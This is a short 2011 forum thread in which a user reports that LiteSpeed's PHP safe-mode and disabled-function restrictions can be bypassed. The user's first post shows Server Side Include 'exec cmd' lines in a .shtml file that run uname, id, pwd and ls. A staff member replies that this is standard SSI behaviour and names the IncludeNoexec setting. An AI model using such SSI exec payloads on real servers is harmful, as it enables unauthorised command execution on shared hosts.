bypass litespeed

Discussion in 'Bug Reports' started by bt5, Oct 31, 2011.

  1. bt5

    bt5 New Member

    Hello,

    here is some bug from litespeed
    can bypass litespeed with file.shtml
    PHP:
    <!--#exec cmd='uname' --> <br><br>
    <!--#exec cmd='id' --> <br><br>
    <!--#exec cmd='pwd' --> <br><br>
    <!--#exec cmd='ls' --> <br><br>
    all comands is working with that also safe mod is on and exct is disabled from functions
  2. mistwang

    mistwang LiteSpeed Staff

    try it under Apache with same configuration see if it works.
    You should set "IncludeNoexec" if you want to disable SSI "exec" cmd.
  3. bt5

    bt5 New Member

    set "IncludeNoexec" to where?
  4. mistwang

    mistwang LiteSpeed Staff

    Please search and read Apache documentation on this.
  5. bt5

    bt5 New Member

    that is why i asked here, my English not good!

Share This Page